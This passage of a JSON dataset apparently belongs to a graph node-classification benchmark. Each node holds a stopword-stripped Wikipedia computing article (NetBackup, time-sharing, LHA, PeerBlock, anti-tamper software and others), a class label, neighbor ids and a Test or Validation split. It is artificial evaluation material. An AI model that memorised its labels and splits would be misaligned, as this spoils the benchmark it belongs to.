prior playback smartdevice central reviewed version 0.71 palm treo 700 2007 called impressive solid piece software summarizing user interface resembling black-and-white macintosh app late 1980s absolutely eye candy whatsoever corecodec inc. discontinued development tcpmp 2006 renamed coreplayer developed commercial sale one review referred quirky rock solid tcpmp bulletproof compared early version new player later reviews mentioned problems stability",
    "neighbors": [
      321,
      5612,
      6797,
      9358,
      7983,
      753,
      823,
      11037,
      11487
    ],
    "mask": "Test"
  },
  {
    "node_id": 11064,
    "label": 9,
    "text": "JAWS_Scripting_Language:jaws scripting language jaws scripting language proprietary programming language facilitates interoperability jaws windows screen reading program practically application–both proprietary off-the-shelf jaws scripting language jsl compiled language allowing source code protection jaws scripting commonly also cumulatively refers customization jaws use built-in user-editable utilities called managers editing configuration files directly combination writing actual scripts scripting language api exposes functionality including combination traditional jaws scripting msaa server direct scripting document object model scripting ensure optimal performance jaws end-users",
    "neighbors": [
      3613
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11065,
    "label": 4,
    "text": "NetBackup:netbackup computing veritas netbackup called symantec netbackup prior symantec divestiture veritas enterprise-level heterogeneous backup recovery suite provides cross-platform backup functionality large variety windows unix linux operating systems netbackup features central master server manages media servers containing backup media clients core server platforms include solaris hp-ux aix tru64 linux windows netbackup opscenter comes bundled netbackup 7.0 distribution replaces netbackup operations manager nom component used previous versions manage multiple netbackup environments netbackup comes support many hardware devices like tape drives tape libraries disk units supports among many features hot backups major database products like oracle natively backup restore virtual machines major virtualization products like vmware infrastructure use network data management protocol ndmp tape vaulting netbackup also enables lan-free server-free backups san fabric environments",
    "neighbors": [
      2051,
      5512,
      6797,
      7955,
      10903,
      6297,
      5924,
      3366,
      1708,
      8368,
      2994,
      2870,
      823,
      3520,
      11201,
      10051,
      2378,
      1358,
      8398,
      6993,
      5470,
      7905,
      9569,
      5612,
      6643,
      10872,
      8572,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11066,
    "label": 3,
    "text": "Macintosh_LC_III:macintosh lc iii macintosh lc iii personal computer designed manufactured sold apple computer inc. february 1993 february 1994 replaced commercially successful macintosh lc ii apple lineup mid-range computers significantly faster macworld magazine benchmarks showing 2x performance major categories cpu disk video math also significantly less expensive lc iii 80 mb hard disk priced 1,349 usd introduction 700 less lc ii lc iii sold primarily exclusively educational institutions corresponding performa variant called performa 450 sold consumer market speed-bumped version called macintosh lc iii+ released october year 33 mhz cpu three performa variants model released 460 466 467 faster models replaced lc iii performa 450 sales original models continuing end 1993 dealers depleted stocks new sales lc iii+ ended early 1994 apple neared completion transition away 68030 processors 68lc040-based lc 475 performa 475 replacements introduced february 10 1993 introduced october 18 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 11067,
    "label": 4,
    "text": "John_Viega:john viega john viega born february 22 1974 american computer security author researcher professional earned ba university virginia undergraduate worked randy pausch stage 3 research group early contributor alice viega earned ms computer science also university virginia john viega co-authored widely used gcm mode operation aes along david a. mcgrew also co-designed predecessor cwc mode john viega also pioneer static analysis security vulnerabilities responsible first publicly available tool its4. well prominent open source rough auditing tool security rats also founded secure software first commercial vendor tools bought fortify software john viega also original author owasp clasp lightweight process relating software development security also former editor-in-chief ieee security privacy magazine addition viega original author gnu mailman mailing list program john viega executive vice president products engineering bae systems applied intelligence joined bae systems 2014 acquisition silversky cloud security provider funded goldman sachs bessemer ventures prior silversky viega mcafee cto saas prior mcafee chief security architect currently teaches nyu previously taught virginia tech co-author building secure software addison wesley 2001 first book teach developers write secure software since co-authored number additional books computer security including myths security o'reilly 2009 beautiful security o'reilly 2009 network security openssl ’ reilly 2002 secure programming cookbook ’ reilly 2003 19 deadly sins software security mcgraw hill 2005",
    "neighbors": [
      4320,
      7556,
      7144,
      7019,
      9293,
      11505
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11068,
    "label": 4,
    "text": "Monoculture_(computer_science):monoculture computer science computer science monoculture community computers run identical software computer systems community thus vulnerabilities like agricultural monocultures subject catastrophic failure event successful attack concept significant discussing computer security viruses clifford stoll wrote 1989 dealing morris worm dan geer argued microsoft monoculture since majority overall number workstations connected internet running versions microsoft windows operating system many vulnerable attacks",
    "neighbors": [
      4228,
      6797,
      8301,
      7983,
      6129,
      6419,
      5492,
      8635,
      9363,
      11604,
      7739,
      2558,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 11069,
    "label": 2,
    "text": "Michael_Simms_(software_developer):michael simms software developer michael simms creator tux games website founder linux game publishing simms began using linux university 1992 writing contributing open source software since 1993 strong belief operating systems file formats need open source order make computing competitive 2000 2001 also worked wcities london lead product architect simms beta tester loki software linux ports descent 3 response unable order versions loki titles british reseller spurred create tux games one first online linux game stores website went live ten seconds midnight 1 january 2000 selling first title 3 january response loki demise effect would tux games simms invested £350,000 company porting windows game titles linux linux game publishing founded 15 october 2001 port publish new games linux simms remained ceo well head development decade likes play majesty strategy games 31 january 2012 simms announced stepping ceo handing control clive crous",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643,
      2685
    ],
    "mask": "Test"
  },
  {
    "node_id": 11070,
    "label": 7,
    "text": "Logicworks:logicworks logicworks cloud computing managed hosting company headquartered new york city offices seattle washington d.c. london logicworks enterprise cloud automation managed service provider company founded february 1993 1998 logicworks changed focus standard web hosting complex types managed hosting high points years included logicworks getting first mysql enterprise partner designation 2003 expanding private cloud hosting 2007 focus cloud continues today starting logicworks cloud 2010 adding another data center bring company three 2011 april 2011 logicworks received 7.6 million venture funding round logicworks cloud offerings marketed traditional cloud computing offers instead remote hosting solutions december 14 2016 logicworks announced raised 135 million private equity firm pamplona capital grow automation consulting business logicworks provides managed services amazon web services cloud infrastructure called managed amazon web services logicworks adds management layer top aws cloud strategize architect implement scale aws cloud instances tools applications 2015 logicworks added aws premier partner network since logicworks added many services including logicworks private cloud offerings based vmware ’ virtualization platform logicworks specializes hipaa pci compliance hosting infrastructure design aws private cloud environments",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      8471,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      8495,
      3121,
      7352,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11071,
    "label": 2,
    "text": "Debug_new:debug new debug_new refers technique c++ overload and/or redefine operator new operator delete order intercept memory allocation deallocation calls thus debug program memory usage often involves defining macro named debug_new makes new become something like new __file__ __line__ record file/line information allocation microsoft visual c++ uses technique microsoft foundation classes ways extend method avoid using macro redefinition still able display file/line information platforms many inherent limitations method applies c++ catch memory leaks c functions like malloc however simple use also fast compared complete memory debugger solutions",
    "neighbors": [
      10654,
      2045,
      814
    ],
    "mask": "Test"
  },
  {
    "node_id": 11072,
    "label": 6,
    "text": "Next3:next3 next3 journaled file system linux based ext3 adds snapshots support yet retains compatibility ext3 on-disk format next3 implemented open-source software licensed gpl license snapshot read-only copy file system frozen point time versioning file systems like next3 internally track old versions files make snapshots available special namespace advantage copy-on-write next3 writes new data blocks containing old data retained allowing snapshot version file system maintained next3 snapshots created quickly since data composing snapshot already stored also space efficient since unchanged data shared among file system snapshots traditional linux logical volume manager volume level snapshots implementation requires storage space allocated advance next3 uses dynamically provisioned snapshots meaning require pre-allocation storage space snapshots instead allocating space needed storage space conserved sharing unchanged data among file system snapshots since next3 aims forward backward compatible earlier ext3 on-disk structures identical ext3 file system mounted read existing ext3 implementations modification next3 like ext3 lacks number features recent designs extents snapshots next3 performance equivalent ext3 performance snapshots minor overhead per write metadata block copy-on-write smaller overhead ~1 per write data block move-on-write 2011 next4 project porting next3 snapshot capabilities ext4 file system mostly completed porting attributed members pune institute computer technology pict chinese academy sciences",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      10265,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      823,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11073,
    "label": 4,
    "text": "PeerBlock:peerblock peerblock free open-source personal firewall blocks packets coming going maintained list black listed hosts peerblock windows successor software peerguardian currently maintained linux blocks incoming outgoing connections ip addresses included blacklists made available internet addresses specified user peerblock mainly uses blacklists provided iblocklist.com peerblock 1.0 based code peerguardian 2 rc1 test3 vista version adds support 32- 64-bit windows vista windows 7 windows 8 peerguardian project ended developer phoenix labs encouraged current peerguardian users migrate peerblock peerblock development small team developers led mark bulas hosting well signed driver funded donations public future donations intended contribute future signed drivers hosting possibly rent virtual private server team able build real online-update feature future releases peerblock introduced 2017 peerblocklist.com offers modern blocklists p2p format compatible peerblock peerblock multiple features latest version program include constantly updating blocklist managed home site manager lets choose lists include block program allows user turn ip http trackers well including log showing time source ip address destination protocol tracker list settings allows users customize program interface well operations september 2013 i-blocklist supplier blocking lists peerblock uses supported unlimited free list updating since september 2013 updates limited weekly except paid subscribers peerblock hard-coded use i-blocklist lists entered revenue-sharing agreement i-blocklist late 2015 blocklists longer available without payment subscription late 2017 peerblocklist.com began offering free blocklists malicious hosts ad-servers peerblock peerguardian users",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      4229,
      4490,
      1163,
      6797,
      1172,
      11029,
      3350,
      9496,
      3482,
      10522,
      1436,
      4511,
      5407,
      6431,
      10531,
      5924,
      550,
      3366,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      3770,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      708,
      2118,
      4814,
      9423,
      3792,
      7121,
      10574,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      3676,
      5085,
      6364,
      11097,
      3428,
      3813,
      3942,
      5860,
      10987,
      8943,
      8816,
      7921,
      9971,
      4725,
      5749,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11074,
    "label": 9,
    "text": "Harlequin_RIP:harlequin rip harlequin rip raster image processor first released 1990 name scriptworks running command-line application render postscript language files unix developed harlequin software company based cambridge england harlequin rip started life 1986 final year university project software developer andy cave project build subset postscript interpreter could preview result converting tex/latex files postscript phd students would n't waste much paper new laserwriter although subset required cave ended creating quite complete implementation 1987 cave joined harlequin limited founding rip division bringing work 'd done bath university early 1990s harlequin commissioned xenotron develop raster image processor rip run macintosh computers drive ultre-based image setters exposing onto film resin-coated rc paper macintosh version proved successful harlequin signed number original equipment manufacturer oem partners sell including pongrass ecrm autologic xitron koronix purup graphic enterprises compose 1992 dos variation core rip developed also sold oem partners replaced version running microsoft windows 1993 1999 harlequin group went receivership bought global graphics harlequin group including staff assets renamed global graphics software limited unix-based command-line version rip phased years later rip finally renamed scriptworks harlequin rip 2004 onwards global graphics expanded reach harlequin rip producing number variants different market sectors harlequin rip sold oem partners builds prepress system digital front end dfe controller therefore sold variety names always easy identify whether system uses harlequin rip current versions harlequin rip interpret harlequin embedded sdk also supports printer command language 5e pcl 5c pcl xl including hpgl printer job language pjl file formats interpreted natively without conversion intermediate format pdf converted postscript vice versa example global graphics claims processing without conversion allows higher speeds avoids artifacts arising conversion native processing live transparency pdfs recognized several awards publishing essential impact award rip year 1997 1998 silver award pre-press news publishing awards 1997 rip/server product year harlequin rip also explicitly supports pdf/x-1a:2001 pdf/x-1a:2003 pdf/x-3:2002 pdf/x-3:2003 pdf/x-4 pdf/x-4p pdf/x-5g pdf/x-5pg set reject files comply standards include conformance information control strip proof harlequin oem partners built dfes full support additional formats personalized print markup language ppml around harlequin rip number extra components available variants harlequin rip leading descriptions harlequin server rip prepress workflow box included additional options include harlequin host renderer launched 2005 version 1.3 released late 2009 core rip functionality hhr tracked harlequin server rip except hhr currently following additional features comparison hsr 8.3 hhr supported linux windows harlequin embedded sdk ebd optimized use within home office printers end supports several versions printer control language pcl well printer job language pjl hewlett-packard graphics language hpgl ebd version 3 released 2009 supported variety real-time near-real-time operating systems including embedded windows xp linux vxworks threadx variety hardware architectures including intel freescale arm without system-on-a-chip soc around cpu global graphics announced partnership conexant provide combination hardware page description language pdl software home small office printers",
    "neighbors": [
      6977,
      9795,
      8426,
      9964,
      6797,
      6830,
      11694,
      8627,
      5492,
      8628,
      823,
      8763
    ],
    "mask": "Test"
  },
  {
    "node_id": 11075,
    "label": 2,
    "text": "Time-sharing:time-sharing computing time-sharing sharing computing resource among many users means multiprogramming multi-tasking time introduction 1960s emergence prominent model computing 1970s represented major technological shift history computing allowing large number users interact concurrently single computer time-sharing dramatically lowered cost providing computing capability made possible individuals organizations use computer without owning one promoted interactive use computers development new interactive applications earliest computers extremely expensive devices slow comparison later models machines typically dedicated particular set tasks operated control panels operator manually entering small programs via switches order load run series programs programs might take hours even weeks run computers grew speed run times dropped soon time taken start next program became concern batch processing methodologies evolved decrease dead periods queuing programs soon one program completed next would start support batch processing operation number comparatively inexpensive card punch paper tape writers used programmers write programs offline typing punching complete programs submitted operations team scheduled run important programs started quickly long less important programs started unpredictable program run finally completed output generally printed returned programmer complete process might take days time programmer might never see computer alternative allowing user operate computer directly generally far expensive consider users might long periods entering code computer remained idle situation limited interactive development organizations could afford waste computing cycles large universities part programmers universities decried behaviors batch processing imposed point stanford students made short film humorously critiquing experimented new ways interact directly computer field today known human–computer interaction time-sharing developed realization single user would make inefficient use computer large group users together would due pattern interaction typically individual user entered bursts information followed long pauses group users working time would mean pauses one user would filled activity others given optimal group size overall process could efficient similarly small slices time spent waiting disk tape network input could granted users concept claimed first described john backus 1954 summer session mit later bob bemer 1957 article consider computer automatic control magazine paper published december 1958 w. f. bauer wrote computers would handle number problems concurrently organizations would input-output equipment installed premises would buy time computer much way average household buys power water utility companies implementing system able take advantage initially difficult batch processing effectively methodological development top earliest systems since computers still ran single programs single users time primary change batch processing time delay one program next developing system supported multiple users time completely different concept state user programs would kept machine switched quickly would take computer cycles slow machines era concern however computers rapidly improved speed especially size core memory users states retained overhead time-sharing continually decreased relatively speaking first project implement time-sharing user programs initiated john mccarthy mit 1959 initially planned modified ibm 704 later additionally modified ibm 709 one first computers powerful enough time-sharing one deliverables project known compatible time-sharing system ctss demonstrated november 1961 ctss good claim first time-sharing system remained use 1973 another contender first demonstrated time-sharing system plato ii created donald bitzer public demonstration robert allerton park near university illinois early 1961 special-purpose system bitzer long said plato project would gotten patent time-sharing university illinois lost patent two years joss began time-sharing service january 1964 first commercially successful time-sharing system dartmouth time sharing system throughout late 1960s 1970s computer terminals multiplexed onto large institutional mainframe computers centralized computing systems many implementations sequentially polled terminals see whether additional data available action requested computer user later technology interconnections interrupt driven used parallel data transfer technologies ieee 488 standard generally computer terminals utilized college properties much places desktop computers personal computers found today earliest days personal computers many fact used particularly smart terminals time-sharing systems dartmouth time sharing system creators wrote 1968 response time averages 10 seconds destroys illusion one computer conversely timesharing users thought terminal computer rise microcomputing early 1980s time-sharing became less significant individual microprocessors sufficiently inexpensive single person could cpu time dedicated solely needs even idle however internet brought general concept time-sharing back popularity expensive corporate server farms costing millions host thousands customers sharing common resources early serial terminals web sites operate primarily bursts activity followed periods idle time bursting nature permits service used many customers usually perceptible communication delays unless servers start get busy genesis 1960s several companies started providing time-sharing services service bureaus early systems used teletype model 33 ksr asr teletype model 35 ksr asr machines ascii environments ibm selectric typewriter-based terminals especially ibm 2741 two different seven-bit codes would connect central computer dial-up bell 103a modem acoustically coupled modems operating 10–15 characters per second later terminals modems supported 30–120 characters per second time-sharing system would provide complete operating environment including variety programming language processors various software packages file storage bulk printing off-line storage users charged rent terminal charge hours connect time charge seconds cpu time charge kilobyte-months disk storage common systems used time-sharing included sds 940 pdp-10 ibm 360 companies providing service included ge geisco ibm subsidiary service bureau corporation tymshare founded 1966 national css founded 1967 bought dun bradstreet 1979 dial data bought tymshare 1968 bolt beranek newman bbn time sharing ltd. u.k.. 1968 32 service bureaus serving us national institutes health nih alone auerbach guide timesharing 1973 lists 125 different timesharing services using equipment burroughs cdc dec hp honeywell ibm rca univac xds 1975 said one major super-mini computer manufacturers biggest end-user market currently time-sharing dec second largest computer company ibm also true pdp-10 ibm 360/67 widely used commercial timesharing services compuserve on-line systems ols rapidata time sharing ltd although many time-sharing services simply closed rapidata held became part national data corporation still sufficient interest 1982 focus user guide statistics programs rapidata timesharing system even revenue fell 66 national data subsequently developed problems attempts made keep timesharing business going beginning 1964 multics operating system designed computing utility modeled electrical telephone utilities 1970s ted nelson original xanadu hypertext repository envisioned service seemed computer industry grew consolidation computing resources would occur timesharing systems 1990s concept however revived somewhat modified form banner cloud computing time-sharing first time multiple processes owned different users running single machine processes could interfere one another example one process might alter shared resources another process relied variable stored memory one user using system would result possibly wrong output multiple users might mean users got see information meant see prevent happening operating system needed enforce set policies determined privileges process example operating system might deny access certain variable certain process first international conference computer security london 1971 primarily driven time-sharing industry customers significant early timesharing systems",
    "neighbors": [
      2560,
      9224,
      3082,
      6155,
      6675,
      7187,
      7188,
      10776,
      25,
      8732,
      4637,
      9762,
      4643,
      6180,
      5158,
      557,
      5678,
      7217,
      10803,
      9780,
      7733,
      4151,
      9784,
      10809,
      7228,
      576,
      2625,
      3650,
      11328,
      1099,
      6221,
      2132,
      2647,
      3160,
      2650,
      11356,
      10333,
      97,
      1121,
      4194,
      5730,
      5733,
      9829,
      11363,
      6248,
      4201,
      6760,
      8298,
      9835,
      10856,
      6772,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      5243,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      3729,
      3218,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      3230,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      7349,
      6329,
      8889,
      4799,
      5823,
      8388,
      6342,
      1736,
      2248,
      6856,
      9932,
      5840,
      7382,
      8410,
      9436,
      9438,
      1247,
      11489,
      1253,
      4331,
      7403,
      11501,
      242,
      5363,
      6906,
      2811,
      3323,
      2813,
      1278,
      9466,
      9468,
      10499,
      5384,
      1804,
      10508,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      8474,
      284,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      10547,
      7477,
      823,
      6967,
      313,
      4409,
      6459,
      7483,
      8509,
      10040,
      7999,
      4423,
      5452,
      6988,
      5456,
      5457,
      11601,
      7507,
      11604,
      9557,
      7511,
      11097,
      11099,
      10590,
      2399,
      1376,
      3426,
      868,
      8551,
      5484,
      7020,
      1902,
      11635,
      5492,
      2933,
      376,
      8573,
      1406,
      7039,
      4992,
      6529,
      8063,
      9599,
      10113,
      8069,
      3976,
      7048,
      394,
      3978,
      4490,
      4492,
      7053,
      7057,
      9105,
      11153,
      11667,
      11675,
      8092,
      6557,
      2462,
      5022,
      8606,
      7076,
      421,
      1445,
      935,
      6056,
      4521,
      9643,
      9644,
      2477,
      4525,
      10668,
      11181,
      7601,
      11184,
      10676,
      1976,
      3512,
      5562,
      6075,
      1469,
      6078,
      9151,
      11204,
      11205,
      1478,
      1480,
      4040,
      8136,
      7630,
      9166,
      978,
      467,
      2519,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 11076,
    "label": 6,
    "text": "LHA_(file_format):lha file format lha freeware compression utility associated file format created 1988 originally named lharc complete rewrite lharc tentatively named lhx eventually released lh renamed lha avoid conflicting then-new ms-dos 5.0 lh load high command according early documentation lha pronounced like la although longer much used west lha remains popular japan used id software compress installation files earlier games including doom quake lha ported many operating systems still main archiving format used amiga computer although competed lzx mid 1990s due aminet world largest archive amiga-related software files standardising stefan boberg implementation lha amiga microsoft released windows xp add-on microsoft compressed lzh folder add-on designed japanese version operating system japanese version windows 7 ships lzh folder add-on built-in users non-japanese versions windows 7 enterprise ultimate also install lzh folder add-on installing optional japanese language pack windows update lzh archive compression method stored five-byte text string third seventh bytes file lharc compresses files using algorithm yoshizaki earlier lzhuf product modified lzari developed uses huffman coding instead arithmetic coding lzari uses lempel–ziv–storer–szymanski arithmetic coding compression method applied source data method introduced lharc version 1 supports 4 kib sliding window support maximum 60 bytes matching length dynamic huffman encoding used method supports 8 kib sliding window support maximum 256 bytes matching length dynamic huffman encoding used methods 4 5 6 7 support 4 8 32 64 kib sliding window respectively support maximum 256 bytes matching length static huffman encoding used lh5 first introduced lharc 2 followed lh6 lha 2.66 msdos lh7 lha 2.67 beta msdos lha never compresses lh4 technically compression method used .lzh archive indicate compressed object empty directory joe jared extended lzss use larger dictionaries dictionary sizes 64 128 256 512 1024 2048 kib respectively unlha32.dll uses method testing purposes uses 128–256 kib dictionary compression methods created pmarc cp/m archiver created miyo archive usually .pma extension popcom compressed executable archive compression method applied source data used indicate pmarc self-extracting archive larc uses file format .lzh written kazuhiko miki haruhiko okumura ken masuyama extension name .lzs supports 2 kib sliding window support maximum 17 bytes matching length similar lzs except dictionary size match length changed compression method applied source data supports 4 kib sliding window support maximum 17 bytes matching length copies lhice marked version 1.14 according okumura lhice written yoshi bug timestamps since year 2011 set 1980 meaning utilities need patched",
    "neighbors": [
      9988,
      6022,
      10121,
      139,
      1420,
      5264,
      2193,
      1940,
      9236,
      3222,
      9880,
      3233,
      9249,
      3114,
      8618,
      10027,
      6062,
      2095,
      432,
      8369,
      11184,
      8115,
      4406,
      4409,
      6713,
      6075,
      10817,
      2755,
      10317,
      1352,
      4296,
      10570,
      3659,
      5709,
      1742,
      4174,
      9166,
      3921,
      850,
      722,
      4561,
      2389,
      4564,
      10575,
      6233,
      3804,
      7422,
      1631,
      3296,
      5729,
      5858,
      9953,
      11614,
      6759,
      5096,
      5736,
      7529,
      1515,
      4459,
      237,
      1646,
      4845,
      5743,
      8940,
      10857,
      7667,
      11123,
      6389,
      11370,
      9848,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 11077,
    "label": 7,
    "text": "Scalable_Source_Routing:scalable source routing scalable source routing ssr routing protocol unstructured networks mobile ad hoc networks mesh networks sensor networks combines source routing routing along virtual ring based idea pushing chord underlay ssr operates flat address space organized virtual ring popular concept peer-to-peer overlay networks like chord common knowledge ring structure enables nodes route packets without knowing topology underlying physical network physical network dynamic structure virtual ring remains rather static therefore flooding physical network avoided packets travel along ring decrease virtual distance destination absolute difference addresses node knows correct predecessor successor virtual ring delivery correct receiving node guaranteed ring said consistent often routing assumed defined orientation ring merely help simplify theory practice necessary even detrimental performance finger table chord provides shortcuts virtual ring replaced route cache physical network ssr utilizes source routing relaying nodes opportunistically cache traversed part source route given packet facilitates collection routing information inhibiting polluting nodes route caches outdated information node need complete path destination route cache make use cache line instead message routed towards physical nearest node makes progress virtual ring message arrives intermediate node node adds information route cache source route step repeated needed message arrives final destination path optimization using dijkstra algorithm route update message sent originator node thus updating originators route cache technique facilitates usage fixed size route caches limits per-node state makes ssr viable option low memory environments ssr complete routing protocol cf osi model network layer also provides semantics distributed hash table reduces overhead overlay protocol top traditional routing protocol greatly expedites lookup operations manets otherwise would rely flooding provided application supports modified support key-based routing provided dht functionality also used implement scalable network services absence servers every node periodically broadcasts hello message physical neighbors notifying neighbors existence hello messages include list physical neighbors node node finds included hello message another node assumes bidirectional connection adds node list physical peers later use routing node also sends neighbor notification message assumed successor join virtual ring contacted node detects correct successor replies message containing best guess successor inquiring node repeated correct virtual neighbors found detailed description process called isprp see another way bootstrapping linearization node routes message ssr reactive well proactive components making hybrid routing protocol virtual ring routing conceptually similar biggest difference usage source routing ssr compared building per-node state routing tables vrr",
    "neighbors": [
      8640,
      9098,
      5725
    ],
    "mask": "None"
  },
  {
    "node_id": 11078,
    "label": 4,
    "text": "Law_Enforcement_Information_Exchange:law enforcement information exchange law enforcement information exchange database maintained naval criminal investigative service eugene r. fidell described database constituting domestic spying according ncis website naval criminal investigative service ncis launched law enforcement information exchange linx initiative 2003 linx designed enhance information sharing local state federal law enforcement areas strategic importance department navy linx provides participating law enforcement partner agencies secure access regional crime incident data tools needed process enabling investigators search across jurisdictional boundaries help solve crimes resolve suspicious events linx designed facilitate cooperation sharing ownership control data remains agency provided",
    "neighbors": [
      6344,
      4086
    ],
    "mask": "Test"
  },
  {
    "node_id": 11079,
    "label": 2,
    "text": "Fira_OS:fira os fira os linux-based mobile operating system software platform developed fira subsidiary indonesian electronic giant polytron member djarum group introduced january 28 2016 forked android installed newer polytron smartphones since 2016 fira os based android open source project aosp linux kernel built comply indonesian regulation requiring 40 minimum local content 4g lte smartphones sold indonesia starting 2017 fira os features applications usually available aosp-based operating systems fira check pulsa fira store fira pay fira directory others",
    "neighbors": [
      8829,
      11271,
      4364,
      5397,
      6301,
      4383,
      10016,
      3626,
      5677,
      7727,
      3248,
      7857,
      823,
      1083,
      7492,
      8262,
      5067,
      7246,
      4305,
      2259,
      7253,
      3542,
      3162,
      607,
      10080,
      8423,
      10215,
      10599,
      6763,
      9964,
      2925,
      495,
      5363,
      8315,
      8316,
      2045,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 11080,
    "label": 3,
    "text": "Jaguar_(microarchitecture):jaguar microarchitecture amd jaguar family 16h low-power microarchitecture designed amd used apus succeeding bobcat family microarchitecture 2013 succeeded amd puma architecture 2014 two-way superscalar capable out-of-order execution used amd semi-custom business unit design custom processors used amd four product families kabini aimed notebooks mini pcs temash aimed tablets kyoto aimed micro-servers g-series aimed embedded applications playstation 4 xbox one use chips based jaguar microarchitecture powerful gpus amd sells commercially available jaguar apus jaguar core support following instruction sets instructions mmx sse sse2 sse3 ssse3 sse4a sse4.1 sse4.2 avx f16c clmul aes bmi1 movbe move big-endian instruction xsave/xsaveopt abm popcnt/lzcnt amd-v. socs using socket am1 2017 derivative jaguar microarchitecture announced apu microsoft xbox one x project scorpio revision xbox one project scorpio apu described 'customized derivative jaguar microarchitecture utilizing eight cores clocked 2.3 ghz puma successor jaguar released 2014 targeting entry level notebooks tablets",
    "neighbors": [
      3585,
      3586,
      6151,
      10761,
      5645,
      11282,
      10260,
      4124,
      2088,
      8237,
      2094,
      6705,
      8250,
      7234,
      2635,
      7783,
      8815,
      1137,
      8322,
      3204,
      11396,
      8327,
      10375,
      1682,
      9369,
      666,
      2719,
      6815,
      9400,
      9913,
      10945,
      2764,
      9427,
      5844,
      11485,
      5859,
      2788,
      5356,
      9964,
      6391,
      9475,
      5380,
      6925,
      6926,
      7963,
      2850,
      11047,
      1849,
      833,
      6978,
      6981,
      9541,
      11080,
      9551,
      6495,
      1377,
      9581,
      9582,
      2935,
      11130,
      9092,
      9122,
      5541,
      11183,
      1461,
      3511,
      8125,
      8126,
      977,
      7122,
      473,
      2524,
      1510,
      1005,
      10734,
      499,
      2549,
      4603,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 11081,
    "label": 4,
    "text": "Anti-tamper_software:anti-tamper software anti-tamper software tamper-resistant software software makes harder attacker modify measures involved passive obfuscation make reverse engineering difficult active tamper-detection techniques aim make program malfunction operate modified essentially tamper resistance implemented software domain shares certain aspects also differs related technologies like copy protection trusted hardware though often used combination anti-tampering technology typically makes software somewhat larger also performance impact provably secure software anti-tampering methods thus field arms race attackers software anti-tampering technologies tampering malicious gain control aspect software unauthorized modification alters computer program code behaviour examples include installing rootkits backdoors disabling security monitoring subverting authentication malicious code injection purposes data theft achieve higher user privileges altering control flow communication license code bypassing purpose software piracy code interference extract data algorithms counterfeiting software applications vulnerable effects tampering code changes throughout lifecycle development deployment operation maintenance anti-tamper protection applied either internally externally application protected external anti-tampering normally accomplished monitoring software detect tampering type defense commonly expressed malware scanners anti-virus applications internal anti-tampering used turn application security system generally done specific code within software detect tampering happens type tamper proofing defense may take form runtime integrity checks cyclic redundancy checksums anti-debugging measures encryption obfuscation execution inside virtual machine become common anti-tamper method used recent years commercial software used example 